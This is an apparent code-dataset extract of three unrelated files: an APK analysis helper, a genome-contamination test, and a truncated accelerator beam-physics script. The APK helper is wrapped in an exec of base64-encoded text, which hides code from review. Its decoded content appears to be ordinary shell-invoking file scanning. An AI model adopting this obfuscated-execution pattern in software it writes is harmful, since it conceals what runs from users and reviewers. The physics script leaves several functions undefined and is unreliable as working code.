| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
147160bd989d35f9fbf36ea166b2e82db1c5c3f8
| 5,392
|
py
|
Python
|
lib/tools.py
|
Ba-hub/R3verseBug
|
2e1f5274a36b6b8b582e2620f1457bde8c262e56
|
[
"MIT"
] | 4
|
2021-08-31T17:36:17.000Z
|
2021-11-08T08:03:58.000Z
|
lib/tools.py
|
Ba-hub/R3verseBug
|
2e1f5274a36b6b8b582e2620f1457bde8c262e56
|
[
"MIT"
] | null | null | null |
lib/tools.py
|
Ba-hub/R3verseBug
|
2e1f5274a36b6b8b582e2620f1457bde8c262e56
|
[
"MIT"
] | 2
|
2021-09-01T02:16:47.000Z
|
2022-02-04T22:28:56.000Z
|
import base64
exec(base64.b64decode('IyEvdXNyL2Jpbi9weXRob24zCiMgLSotIGNvZGluZzp1dGYtOCAtKi0KaW1wb3J0IHJhbmRvbQppbXBvcnQgb3MKaW1wb3J0IHN0cmluZwppbXBvcnQgc3VicHJvY2VzcwppbXBvcnQgcmUKZnJvbSByaWNoLmNvbnNvbGUgaW1wb3J0IENvbnNvbGUKCgpjb25zb2xlID0gQ29uc29sZSgpCgojIEZpbGUgd2hpdGVsaXN0LCBpZiB5b3UgZG9u4oCZdCBuZWVkIGl0LCB5b3UgY2FuIGNsZWFyIGl0LCBvciB5b3UgY2FuIGFkZCBpdCB5b3Vyc2VsZgp3aGl0ZUxpc3QgPSBbJ2ZhY2Vib29rJywgJ3RlbmNlbnQnLCAnaHVhd2VpJywgJ2FsaXl1bicsICdhbmRyb2lkL3N1cHBvcnQnLCAneGlhb21pJywgJ3Zpdm8nLCAnb3BwbycsICdhaXJibmInLCAnYW1hcCcsCiAgICAgICAgICAgICAnYWxpcGF5JywgJ2dvb2dsZScsICdva2h0dHAzJywgJ3JldHJvZml0MicsICdtb3ppbGxhJywgJ2ZyZWVtYXJrZXInLCAnYWxpYmFiYScsICdxaWhvbycsICdnc29uJywgJ2pwdXNoJywKICAgICAgICAgICAgICdidWd0YWdzJywgJ3RyZWxsbycsICdidW1wdGVjaCcsICdqaWd1YW5nJywgJ2dpdGh1YicsICd1bWVuZycsICdncmVlbnJvYm90JywgJ2VjbGlwc2UnLCAnYnVnbHknLCAnc2luYScsCiAgICAgICAgICAgICAnd2VpYm8nLCAnajI1NicsICd0YW9iYW8vd2VleCcsICdpZmx5dGVrJywgJ2FuZHJvaWR4LycsICdtZWl6dScsICdpby9hZ29yYScsICdpamtwbGF5ZXInLCAnc3FsY2lwaGVyJywKICAgICAgICAgICAgICdjbWljL3NzbycsICdzaGFueWFuX3NkaycsICdzdmdhcGxheWVyJywgJ2lvL2ZsdXR0ZXInLCAnYnl0ZWRhbmNlJywgJ2tvdGxpbicsICdvcmcvYXBhY2hlJywgJ29yZy9hc3BlY3RqJywKICAgICAgICAgICAgICdiYWlkdScsICd5b3V6YW4nLCAnamRwYXlzZGsnLCAncXEnLCAna290bGlueCcsICcvYW5kcm9pZC8nXQoKdGFza3MgPSBbXQoKCmNsYXNzIFJ1bkNNRDoKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLnAgPSBOb25lCiAgICAgICAgc2VsZi5jbWQgPSBOb25lCgogICAgZGVmIHJ1bl9jbWQoc2VsZik6CiAgICAgICAgc2VsZi5wID0gc3VicHJvY2Vzcy5Qb3BlbihzZWxmLmNtZCwgc3Rkb3V0PXN1YnByb2Nlc3MuUElQRSwgc3RkZXJyPXN1YnByb2Nlc3MuUElQRSwgc2hlbGw9VHJ1ZSkKICAgICAgICB0YXNrcy5hcHBlbmQoc2VsZikKICAgICAgICByZXR1cm4gc2VsZi5wLmNvbW11bmljYXRlKCkKCiAgICBAcHJvcGVydHkKICAgIGRlZiBpc19ydW5uaW5nKHNlbGYpOgogICAgICAgIGlmIHNlbGYucC5wb2xsKCkgaXMgTm9uZToKICAgICAgICAgICAgcmV0dXJuIFRydWUKICAgICAgICBlbHNlOgogICAgICAgICAgICB0YXNrcy5yZW1vdmUoc2VsZikKICAgICAgICAgICAgcmV0dXJuIEZhbHNlCgogICAgZGVmIHN0b3Aoc2VsZik6CiAgICAgICAgc2VsZi5wLmtpbGwoKQogICAgICAgIHRhc2tzLnJlbW92ZShzZWxmKQoKICAgIGRlZiBsb2coc2VsZik6CiAgICAgICAgcmV0dXJuICcnLmpvaW4oW3N0cihpdGVtLCBlbmNvZGluZz0ndXRmLTgnKSBmb3IgaXRlbSBpbiBzZWxmLnAuY29tbXVuaWNhdGUoKV0pCgoKZGVmIGNtZFN0cmluZyhzdHJsaW5lKToKICAgIHJldHVybiBzdHJsaW5lICsgJyB8ICcgKyBncmVwVGhpcmRGaWxlKCkKCgpkZWYgcmFuZG9tU3RyKG51bSk6CiAgICByZXR1cm4gJ18nICsgJycuam9pbihyYW5kb20uc2FtcGxlKHN0cmluZy5hc2NpaV9sZXR0ZXJzICsgc3RyaW5nLmRpZ2l0cywgbnVtKSkKCgpkZWYgZ2V0QVBLRmlsZXMoZGlyKToKICAgIGZpbGVzQXJyYXkgPSBbXQogICAgZGlybGlzdCA9IG9zLndhbGsoZGlyKQogICAganNGaWxlcyA9IFtdCiAgICBmb3Igcm9vdCwgZGlycywgZmlsZXMgaW4gZGlybGlzdDoKICAgICAgICBmb3IgZmlsZSBpbiBmaWxlczoKICAgICAgICAgICAgcGF0aCA9IG9zLnBhdGguam9pbihyb290LCBmaWxlKQogICAgICAgICAgICBpZiBmaWxlLmVuZHN3aXRoKCcuc21hbGknKSBvciBmaWxlLmVuZHN3aXRoKCcuc28nKSBvciBmaWxlLmVuZHN3aXRoKCcueG1sJykgb3IgZmlsZS5lbmRzd2l0aCgKICAgICAgICAgICAgICAgICAgICAnLnltbCcpIG9yIGZpbGUuZW5kc3dpdGgoJy5odG1sJyk6CiAgICAgICAgICAgICAgICBpZiAnL29yaWdpbmFsLycgbm90IGluIHBhdGg6CiAgICAgICAgICAgICAgICAgICAgZmlsZXNBcnJheS5hcHBlbmQocGF0aCkKICAgICAgICAgICAgaWYgZmlsZS5lbmRzd2l0aCgnLmpzJyk6CiAgICAgICAgICAgICAgICBqc0ZpbGVzLmFwcGVuZChwYXRoKQogICAgICAgICAgICBpZiBmaWxlLmVuZHN3aXRoKCcuanNidW5kbGUnKSBvciBmaWxlLmVuZHN3aXRoKCcucm5idW5kbGUnKToKICAgICAgICAgICAgICAgIHBhdGggPSBjaGFuZ2VKU0J1bmRsZUZpbGUocGF0aCkKICAgICAgICAgICAgICAgIGpzRmlsZXMuYXBwZW5kKHBhdGgpCiAgICBuZXdQYXRocyA9IGpzQmVhdXRpZnkoanNGaWxlcykKICAgIGZpbGVzQXJyYXkgPSBmaWxlc0FycmF5ICsgbmV3UGF0aHMKICAgIHJldHVybiBmaWxlc0FycmF5CgoKZGVmIGdldEZpbGVOYW1lKHBhdGgpOgogICAgaWYgbGVuKHBhdGgpID4gMDoKICAgICAgICBpdGVtcyA9IHN0cihwYXRoKS5zcGxpdCgnLycpCiAgICAgICAgZGlyID0gJycKICAgICAgICBzdGFydCA9IC0xCiAgICAgICAgZm9yIGkgaW4gcmFuZ2UobGVuKGl0ZW1zKSk6CiAgICAgICAgICAgIGlmICdzbWFsaScgaW4gaXRlbXNbaV0gYW5kICcuc21hbGknIG5vdCBpbiBpdGVtc1tpXToKICAgICAgICAgICAgICAgIHN0YXJ0ID0gaQogICAgICAgICAgICBpZiBzdGFydCAhPSAtMSBhbmQgc3RhcnQgIT0gaToKICAgICAgICAgICAgICAgIGRpciArPSBpdGVtc1tpXSArICcuJwogICAgICAgIHJldHVybiBkaXJbOi0xXQogICAgZWxzZToKICAgICAgICByZXR1cm4gJycKCgpkZWYganNCZWF1dGlmeShqc0ZpbGVzKToKICAgIG5ld0ZpbGVzID0gW10KICAgIGZvciBmaWxlIGluIGpzRmlsZXM6CiAgICAgICAgYmVhdXRpZnlGaWxlID0gZmlsZVs6LTNdICsgJzEuanMnCiAgICAgICAgbmV3RmlsZXMuYXBwZW5kKGJlYXV0aWZ5RmlsZSkKICAgICAgICBzdHJsaW5lID0gJ2pzLWJlYXV0aWZ5ICcgKyBmaWxlICsgJyA+ICcgKyBiZWF1dGlmeUZpbGUKICAgICAgICBydW5uZXIgPSBSdW5DTUQoKQogICAgICAgIHJ1bm5lci5jbWQgPSBzdHJsaW5lCiAgICAgICAgcnVubmVyLnJ1bl9jbWQoKQogICAgd2hpbGUgbGVuKHRhc2tzKSA+IDA6CiAgICAgICAgZm9yIGl0ZW0gaW4gdGFza3M6CiAgICAgICAgICAgIGl0ZW0uaXNfcnVubmluZwogICAgcmV0dXJuIG5ld0ZpbGVzCgoKZGVmIGNoYW5nZUpTQnVuZGxlRmlsZShmaWxlbmFtZSk6CiAgICBwb3J0aW9uID0gb3MucGF0aC5zcGxpdGV4dChmaWxlbmFtZSkKICAgIG5ld05hbWUgPSBmaWxlbmFtZQogICAgaWYgcG9ydGlvblsxXSA9PSAnLmpzYnVuZGxlJyBvciBwb3J0aW9uWzFdID09ICcucm5idW5kbGUnOgogICAgICAgIG5ld05hbWUgPSBzdHIocG9ydGlvblswXSkgKyAnLmpzJwogICAgICAgIG9zLnJlbmFtZShmaWxlbmFtZSwgbmV3TmFtZSkKICAgIHJldHVybiBuZXdOYW1lCgoKZGVmIGdldFVSTChsaW5lKToKICAgIHBhdHRlcm4gPSByZS5jb21waWxlKHInaHR0cFtzXT86Ly8oPzpbYS16QS1aXXxbMC05XXxbJC1fQC4mK118WyEqXChcKSxdfCg/OiVbMC05YS1mQS1GXVswLTlhLWZBLUZdKSkrJykKICAgIHVybHMgPSByZS5maW5kYWxsKHBhdHRlcm4sIGxpbmVbOi0xXSkKICAgIHJldHVybiB1cmxzCgoKZGVmIGdyZXBUaGlyZEZpbGUoKToKICAgIHJldHVybiAiZ3JlcCAtdiAnIiArICdcfCcuam9pbih3aGl0ZUxpc3QpICsgIiciCgoKZGVmIGdldFNtYWxpcyhhcnJzKToKICAgIHBhdGhzID0gW10KICAgIGZvciBpdGVtIGluIGFycnM6CiAgICAgICAgaWYgJy5zbWFsaTonIGluIGl0ZW06CiAgICAgICAgICAgIHBhdGggPSBpdGVtLnNwbGl0KCc6JylbMF0KICAgICAgICAgICAgaWYgcGF0aCBub3QgaW4gcGF0aHM6CiAgICAgICAgICAgICAgICBwYXRocy5hcHBlbmQocGF0aCkKICAgIHJldHVybiBwYXRocw=='))
| 2,696
| 5,378
| 0.997404
| 9
| 5,392
| 597.555556
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084045
| 0.000371
| 5,392
| 2
| 5,378
| 2,696
| 0.913729
| 0
| 0
| 0
| 0
| 0
| 0.992398
| 0.992398
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
1af4775a19055bc63f5325e2bd4f8f3c61af8609
| 2,233
|
py
|
Python
|
tests/test_contigs_list_contaminants.py
|
dib-lab/charcoal
|
b9c2b8d920f7b144c28daae5eba7ee46646ac287
|
[
"BSD-3-Clause"
] | 21
|
2020-05-08T20:51:19.000Z
|
2022-02-04T23:00:17.000Z
|
tests/test_contigs_list_contaminants.py
|
dib-lab/charcoal
|
b9c2b8d920f7b144c28daae5eba7ee46646ac287
|
[
"BSD-3-Clause"
] | 162
|
2020-03-11T21:32:28.000Z
|
2022-03-09T01:02:14.000Z
|
tests/test_contigs_list_contaminants.py
|
dib-lab/charcoal
|
b9c2b8d920f7b144c28daae5eba7ee46646ac287
|
[
"BSD-3-Clause"
] | 1
|
2020-03-11T21:24:13.000Z
|
2020-03-11T21:24:13.000Z
|
import os.path
from . import pytest_utils as utils
import json
from charcoal import contigs_list_contaminants
@utils.in_tempdir
def test_1_loomba(location):
# regression test/check for same results on Loomba
args = utils.Args()
args.genome = utils.relative_file("demo/genomes/LoombaR_2017__SID1050_bax__bin.11.fa.gz")
args.genome_sig = utils.relative_file("tests/test-data/loomba/LoombaR_2017__SID1050_bax__bin.11.fa.gz.sig")
args.matches_csv = utils.relative_file("tests/test-data/loomba/LoombaR_2017__SID1050_bax__bin.11.fa.gz.matches.csv")
args.databases = [utils.relative_file('tests/test-data/loomba/LoombaR_2017__SID1050_bax__bin.11.fa.gz.matches.zip')]
args.lineages_csv = utils.relative_file("tests/test-data/test-match-lineages.csv")
args.hitlist = utils.relative_file("tests/test-data/loomba-hit-list.csv")
args.json_out = os.path.join(location, 'tax.json')
args.match_rank = 'genus'
status = contigs_list_contaminants.main(args)
assert status == 0
assert os.path.exists(args.json_out)
with open(args.json_out, 'rt') as fp:
results = json.load(fp)
assert results != {}
@utils.in_tempdir
def test_1_loomba_abund(location):
# regression test/check for same results on Loomba - with abund sigs
args = utils.Args()
args.genome = utils.relative_file("demo/genomes/LoombaR_2017__SID1050_bax__bin.11.fa.gz")
args.genome_sig = utils.relative_file("tests/test-data/loomba/LoombaR_2017__SID1050_bax__bin.11.fa.gz.sig")
args.matches_csv = utils.relative_file("tests/test-data/loomba/LoombaR_2017__SID1050_bax__bin.11.fa.gz.matches.csv")
args.databases = [utils.relative_file('tests/test-data/loomba/LoombaR_2017__SID1050_bax__bin.11.fa.gz.matches.abund.zip')]
args.lineages_csv = utils.relative_file("tests/test-data/test-match-lineages.csv")
args.hitlist = utils.relative_file("tests/test-data/loomba-hit-list.csv")
args.json_out = os.path.join(location, 'tax.json')
args.match_rank = 'genus'
status = contigs_list_contaminants.main(args)
assert status == 0
assert os.path.exists(args.json_out)
with open(args.json_out, 'rt') as fp:
results = json.load(fp)
assert results != {}
| 42.942308
| 126
| 0.743395
| 342
| 2,233
| 4.596491
| 0.195906
| 0.099237
| 0.129771
| 0.139949
| 0.927481
| 0.927481
| 0.927481
| 0.891858
| 0.891858
| 0.829517
| 0
| 0.043299
| 0.131214
| 2,233
| 51
| 127
| 43.784314
| 0.76701
| 0.0515
| 0
| 0.789474
| 0
| 0.026316
| 0.338534
| 0.32435
| 0
| 0
| 0
| 0
| 0.157895
| 1
| 0.052632
| false
| 0
| 0.105263
| 0
| 0.157895
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2120419e1b7a9fa90c11b68cfcb67fda90e7e959
| 16,081
|
py
|
Python
|
ibs/old/CIMP_3HC.py
|
carneirofc/lnls
|
55bc009f24927d14fc14bdb2ca1c067b5fe413c2
|
[
"MIT"
] | 4
|
2015-04-13T23:20:42.000Z
|
2019-03-18T13:31:03.000Z
|
ibs/old/CIMP_3HC.py
|
carneirofc/lnls
|
55bc009f24927d14fc14bdb2ca1c067b5fe413c2
|
[
"MIT"
] | 6
|
2015-04-16T04:29:40.000Z
|
2022-02-08T18:41:05.000Z
|
ibs/old/CIMP_3HC.py
|
carneirofc/lnls
|
55bc009f24927d14fc14bdb2ca1c067b5fe413c2
|
[
"MIT"
] | 2
|
2015-12-03T08:25:55.000Z
|
2022-02-08T13:05:47.000Z
|
import numpy as _np
import math as _math
def g_CIMP(x):
x=x[0,:]
g=_np.zeros(len(x))
#g=2.691*(1-0.2288964/x)*1/((1+0.16*x)*(1+1.35*_np.exp(-x/0.2)))
if (max(x)<1):
g=-18.743261164767357+101.6507221241339*x**(0.33333333)-104.59646433814892*_np.sqrt(x)+33.73393945878933*x-10.325598001906716*x**(1.5)
elif (min(x)>1):
g=1.1976693536243692*(1-0.2660904859953754/x)*1/((1+0.04920104690300144*x)*(1-0.5874697493344921*_np.exp(-x*0.09913039025775051)))
else:
g=2.691*(1-0.2288964/x)*1/((1+0.16*x)*(1+1.35*_np.exp(-x/0.2)))
return g
def gauss_function(x, a, x0, sigma):
return a*_np.exp(-(x-x0)**2/(2*sigma**2))
def calc_sigma(pos,profile):
max_val=max(profile)
min_val=min(profile)
profile=(profile-min_val)/max_val
aux=profile*pos
ycm=_np.sum(aux)/_np.sum(profile)
aux=profile*(pos-ycm)**2
yvar=sqrt(_np.sum(aux)/_np.sum(profile))
return (ycm,yvar)
def Calc_Growth(twiss,param):
#Define parameters
brel=_math.sqrt(1-1/param['gamma']**2)
ex=param['exi']
ey=param['eyi']
ss=param['ssi']
sp=param['spi']
#Define twiss arrays
s=_np.zeros(len(twiss))
betax=_np.zeros(len(twiss))
alphax=_np.zeros(len(twiss))
betay=_np.zeros(len(twiss))
alphay=_np.zeros(len(twiss))
Dx=_np.zeros(len(twiss))
Dpx=_np.zeros(len(twiss))
Dy=_np.zeros(len(twiss))
Dpy=_np.zeros(len(twiss))
# s=twiss[:,0]
# betax=twiss[:,2]
# alphax=twiss[:,3]
# betay=twiss[:,6]
# alphay=twiss[:,7]
# Dx=twiss[:,4]
# Dpx=twiss[:,5]
# Dy=twiss[:,8]
# Dpy=twiss[:,9]
s=twiss[:,0]
#len=twiss[:,1]
#mux=twiss[:,2]
betax=twiss[:,3]
alphax=twiss[:,4]
Dx=twiss[:,5]
Dpx=twiss[:,6]
#muy=twiss[:,7]
betay=twiss[:,8]
alphay=twiss[:,9]
Dy=twiss[:,10]
Dpy=twiss[:,11]
#Calculate the parameters
Np = param['Np']
A=param['cluz']*Np*param['r0']**2/(64*_np.pi**2*brel**3*param['gamma']**4*ex*ey*ss*sp)
logCIMP=_np.log(param['gamma']**2*ex*_np.sqrt(betay*ey)/(param['r0']*betax))
Hx=1/betax*[Dx**2+(betax*Dpx+alphax*Dx)**2]
Hy=1/betay*[Dy**2+(betay*Dpy+alphay*Dy)**2]
SigH=_np.sqrt(1/sp**2+Hx/ex+Hy/ey)**(-1)
aCIMP=SigH/param['gamma']*_np.sqrt(betax/ex)
bCIMP=SigH/param['gamma']*_np.sqrt(betay/ey)
#Calculate Function g
g_ab=g_CIMP(aCIMP/bCIMP)
g_ba=g_CIMP(bCIMP/aCIMP)
#Saves values for the ration a/b and b/a
#f=open('RatioAB.txt','w')
#for j in range(len(aCIMP[0,:])):
# f.write(str(aCIMP[0,j]/bCIMP[0,j])+'\t\t'+str(bCIMP[0,j]/aCIMP[0,j])+'\n')
#f.close()
#Calculate Growth Rates
fp=A*logCIMP*(SigH**2/sp**2)*(g_ba/aCIMP+g_ab/bCIMP)
fx=A*logCIMP*(-aCIMP*g_ba+Hx*SigH**2/ex*(g_ba/aCIMP+g_ab/bCIMP))
fy=A*logCIMP*(-bCIMP*g_ab+Hy*SigH**2/ey*(g_ba/aCIMP+g_ab/bCIMP))
#Integrate along the s coordinate
invTp=2*_math.pi**(3.0/2.0)*_np.trapz(fp,s)
invTx=2*_math.pi**(3.0/2.0)*_np.trapz(fx,s)
invTy=2*_math.pi**(3.0/2.0)*_np.trapz(fy,s)
#Calculate growth
Tp=invTp
Tx=invTx
Ty=invTy
return (Tx,Ty,Tp)
# Fucntion that iterates emittances for the case with no harmonic system (simple calculation of the bunch length)
def Iterate_emittances(twiss,param):
#Define differences
i=1
time=0
diff1=1
diff2=1
diff3=1
diff4=1
difftot=diff1+diff2+diff3+diff4
#Calculate U0
U0=param['Cgamma']/(2*_math.pi)*(param['En']/1e+9)**4*param['I2']*1e+9
#print U0
#Calculate damping partition numbers
Jx=1-param['I4']/param['I2']
Jy=1
Jp=2+param['I4']/param['I2']
#print Jx,Jy,Jp
# Caluclate damping times
taux=(2*param['En']*param['C'])/(Jx*U0*param['cluz'])
tauy=(2*param['En']*param['C'])/(Jy*U0*param['cluz'])
taup=(2*param['En']*param['C'])/(Jp*U0*param['cluz'])
#print taux,tauy,taup
#Define step for iteration
tt=taux/5
# Synchrotron tune
Qs0=_math.sqrt(param['ap']*param['hh']*_math.sqrt(param['Vrf']**2-U0**2)/(2*_math.pi*param['En']))
#Cretaes an array that's a subgroup of param
inter={}
inter['exi']=param['ex0']
inter['eyi']=(param['k_dw']+param['k_beta'])*param['ex0']
inter['ssi']=param['ss0']
inter['spi']=param['sp0']
inter['gamma']=param['gamma']
inter['r0']=param['r0']
inter['Np']=param['Np']
inter['cluz']=param['cluz']
while (difftot>10**(-7)):
(Tx,Ty,Tp)=Calc_Growth(twiss,inter)
Tx=float(Tx)/param['C']
Ty=float(Ty)/param['C']
Tp=float(Tp)/param['C']
#print Tx,Ty,Tp
exx=(-param['ex0']+_math.exp(2*tt*(Tx-1/taux))*(param['ex0']+inter['exi']*(-1+Tx*taux)))/(-1+Tx*taux)
eyy=(-(param['k_dw']*param['ex0']+param['k_beta']*exx*(1-tauy/Ty))+_math.exp(2*tt*(Ty-1/tauy))*((param['k_dw']*param['ex0']+param['k_beta']*exx*(1-tauy/Ty))+inter['eyi']*(-1+Ty*tauy)))/(-1+Ty*tauy)
spp=(-param['sp0']+_math.exp(tt*(Tp-1/taup))*(param['sp0']+inter['spi']*(-1+Tp*taup)))/(-1+Tp*taup)
# Accelerating cavity system only
sss=inter['spi']*param['C']*_math.sqrt(param['ap']*param['En']/(2*_math.pi*param['hh']*(param['Vrf']**2-U0**2)**0.5));
#print exx,eyy,spp,sss
diff1=abs(exx-inter['exi'])/inter['exi']
diff2=abs(eyy-inter['eyi'])/inter['eyi']
diff3=abs(spp-inter['spi'])/inter['spi']
diff4=abs(sss-inter['ssi'])/inter['ssi']
difftot=diff1+diff2+diff3+diff4
#print difftot
inter['exi']=exx;
inter['eyi']=eyy;
inter['spi']=spp;
inter['ssi']=sss;
time=i*tt;
i=i+1
return (exx,eyy,spp,sss)
# Function that iterates emittances using the results from tracking to calculate bunch length
def Iterate_emittances3HC(twiss,param,phimain,Vmain,phiharm,Vharm):
#Define differences
i=1
time=0
diff1=1
diff2=1
diff3=1
diff4=1
difftot=diff1+diff2+diff3+diff4
#Calculate U0
U0=param['Cgamma']/(2*pi)*(param['En']/1e+9)**4*param['I2']*1e+9
#Calculate synchronous phase
Phi_sync_nat=asin(U0/param['Vrf'])
#Calculate damping partition numbers
Jx=1-param['I4']/param['I2']
Jy=1
Jp=2+param['I4']/param['I2']
#print Jx,Jy,Jp
# Caluclate damping times
taux=(2*param['En']*param['C'])/(Jx*U0*param['cluz'])
tauy=(2*param['En']*param['C'])/(Jy*U0*param['cluz'])
taup=(2*param['En']*param['C'])/(Jp*U0*param['cluz'])
#print taux,tauy,taup
#Define step for iteration
tt=taux/5
#RF frequency
w_rf =2*pi*(param['hh']*param['cluz']/param['C']-param['Detune0']) #Generator Frequency
#Creates arrays for 3HC calculation
posz=_np.zeros(5000)
perfil=_np.zeros(5000)
pot=_np.zeros(5000)
#Define longitudinal scale array
posz=_np.arange(0,5000.)/10-250 # in milimiters
#Cretaes an array that's a subgroup of param
inter={}
inter['exi']=param['ex0']
inter['eyi']=(param['k_dw']+param['k_beta'])*param['ex0']
inter['spi']=param['sp0']
inter['gamma']=param['gamma']
inter['r0']=param['r0']
inter['Np']=param['Np']
inter['cluz']=param['cluz']
pot=1/(param['En']*param['C'])*param['cluz']/w_rf*(Vmain*1e3*(cos(Phi_sync_nat-phimain)-_np.cos(posz/1000*w_rf/param['cluz']+Phi_sync_nat-phimain))+Vharm*1e3/param['mharm']*(cos(param['mharm']*pi-phiharm)-_np.cos(param['mharm']*posz/1000*w_rf/param['cluz']+param['mharm']*pi-phiharm)))-1/(param['En']*param['C'])*U0*posz/1000
perfil=_np.exp(-pot/(param['ap']*param['sp0']**2))
(pos0,sigma_mm)=calc_sigma(posz,perfil)
inter['ssi']=sigma_mm/1000
while (difftot>10**(-7)):
(Tx,Ty,Tp)=Calc_Growth(twiss,inter)
Tx=float(Tx)/param['C']
Ty=float(Ty)/param['C']
Tp=float(Tp)/param['C']
#print Tx,Ty,Tp
exx=(-param['ex0']+exp(2*tt*(Tx-1/taux))*(param['ex0']+inter['exi']*(-1+Tx*taux)))/(-1+Tx*taux)
eyy=(-(param['k_dw']*param['ex0']+param['k_beta']*exx*(1-tauy/Ty))+exp(2*tt*(Ty-1/tauy))*((param['k_dw']*param['ex0']+param['k_beta']*exx*(1-tauy/Ty))+inter['eyi']*(-1+Ty*tauy)))/(-1+Ty*tauy)
spp=(-param['sp0']+exp(tt*(Tp-1/taup))*(param['sp0']+inter['spi']*(-1+Tp*taup)))/(-1+Tp*taup)
#Calculate bunch length according to the RF potential (Main RF + 3HC)
pot=1/(param['En']*param['C'])*param['cluz']/w_rf*(Vmain*1e3*(cos(Phi_sync_nat-phimain)-_np.cos(posz/1000*w_rf/param['cluz']+Phi_sync_nat-phimain))+Vharm*1e3/param['mharm']*(cos(param['mharm']*pi-phiharm)-_np.cos(param['mharm']*posz/1000*w_rf/param['cluz']+param['mharm']*pi-phiharm)))-1/(param['En']*param['C'])*U0*posz/1000
perfil=_np.exp(-pot/(param['ap']*spp**2))
(pos0,sigma_mm)=calc_sigma(posz,perfil)
sss=sigma_mm/1000
#print exx,eyy,spp,sss
diff1=abs(exx-inter['exi'])/inter['exi']
diff2=abs(eyy-inter['eyi'])/inter['eyi']
diff3=abs(spp-inter['spi'])/inter['spi']
diff4=abs(sss-inter['ssi'])/inter['ssi']
difftot=diff1+diff2+diff3+diff4
#print difftot
inter['exi']=exx;
inter['eyi']=eyy;
inter['spi']=spp;
inter['ssi']=sss;
time=i*tt;
i=i+1
return (exx,eyy,spp,sss)
# Function that iterates emittances for the case with no harmonic system (simple calculation of the bunch length) but
# takes into account the longitudinal growth rate due to microwave instability
def Iterate_emittancesMW(twiss,param,sigS,Curr,GT):
#Define differences
i=1
time=0
diff1=1
diff2=1
diff3=1
diff4=1
difftot=diff1+diff2+diff3+diff4
#Calculate U0
U0=param['Cgamma']/(2*pi)*(param['En']/1e+9)**4*param['I2']*1e+9
#print U0
#Calculate damping partition numbers
Jx=1-param['I4']/param['I2']
Jy=1
Jp=2+param['I4']/param['I2']
#print Jx,Jy,Jp
# Caluclate damping times
taux=(2*param['En']*param['C'])/(Jx*U0*param['cluz'])
tauy=(2*param['En']*param['C'])/(Jy*U0*param['cluz'])
taup=(2*param['En']*param['C'])/(Jp*U0*param['cluz'])
#print taux,tauy,taup
#Define step for iteration
tt=taux/5
# Synchrotron tune
Qs0=sqrt(param['ap']*param['hh']*sqrt(param['Vrf']**2-U0**2)/(2*pi*param['En']))
# Define the interpolation function for Microwave Instability
microwave=interp2d(sigS,Curr,GT,kind='linear')
#Cretaes an array that's a subgroup of param
inter={}
inter['exi']=param['ex0']
inter['eyi']=(param['k_dw']+param['k_beta'])*param['ex0']
inter['ssi']=param['ss0']
inter['spi']=param['sp0']
inter['gamma']=param['gamma']
inter['r0']=param['r0']
inter['Np']=param['Np']
inter['cluz']=param['cluz']
sss=param['ss0']
while (difftot>10**(-7)):
#Add the Microwave growth rate to the longitudinal plane
DTp=microwave(sss,param['Np'])
#print DTp
(Tx,Ty,Tp)=Calc_Growth(twiss,inter)
Tx=float(Tx)/param['C']
Ty=float(Ty)/param['C']
Tp=float(Tp)/param['C']+DTp
exx=(-param['ex0']+exp(2*tt*(Tx-1/taux))*(param['ex0']+inter['exi']*(-1+Tx*taux)))/(-1+Tx*taux)
#eyy=(-param['ey0']+exp(2*tt*(Ty-1/tauy))*(param['ey0']+inter['eyi']*(-1+Ty*tauy)))/(-1+Ty*tauy)
eyy=(-(param['k_dw']*param['ex0']+param['k_beta']*exx*(1-tauy/Ty))+exp(2*tt*(Ty-1/tauy))*((param['k_dw']*param['ex0']+param['k_beta']*exx*(1-tauy/Ty))+inter['eyi']*(-1+Ty*tauy)))/(-1+Ty*tauy)
spp=(-param['sp0']+exp(tt*(Tp-1/taup))*(param['sp0']+inter['spi']*(-1+Tp*taup)))/(-1+Tp*taup)
# Accelerating cavity system only
sss=inter['spi']*param['C']*sqrt(param['ap']*param['En']/(2*pi*param['hh']*(param['Vrf']**2-U0**2)**0.5));
diff1=abs(exx-inter['exi'])/inter['exi']
diff2=abs(eyy-inter['eyi'])/inter['eyi']
diff3=abs(spp-inter['spi'])/inter['spi']
diff4=abs(sss-inter['ssi'])/inter['ssi']
difftot=diff1+diff2+diff3+diff4
#print difftot
inter['exi']=exx;
inter['eyi']=eyy;
inter['spi']=spp;
inter['ssi']=sss;
time=i*tt;
i=i+1
return (exx,eyy,spp,sss)
# Function that iterates emittances using the results from tracking to calculate bunch length
# and also takes into account the longitudinal growth rate due to microwave instability
def Iterate_emittances3HC_MW(twiss,param,phimain,Vmain,phiharm,Vharm,sigS,Curr,GT):
#Definde differences
i=1
time=0
diff1=1
diff2=1
diff3=1
diff4=1
difftot=diff1+diff2+diff3+diff4
#Calculate U0
U0=param['Cgamma']/(2*pi)*(param['En']/1e+9)**4*param['I2']*1e+9
#Calculate synchronous phase
Phi_sync_nat=asin(U0/param['Vrf'])
#Calculate damping partition numbers
Jx=1-param['I4']/param['I2']
Jy=1
Jp=2+param['I4']/param['I2']
#print Jx,Jy,Jp
# Caluclate damping times
taux=(2*param['En']*param['C'])/(Jx*U0*param['cluz'])
tauy=(2*param['En']*param['C'])/(Jy*U0*param['cluz'])
taup=(2*param['En']*param['C'])/(Jp*U0*param['cluz'])
#print taux,tauy,taup
#Define step for iteration
tt=taux/5
# Synchrotron tune
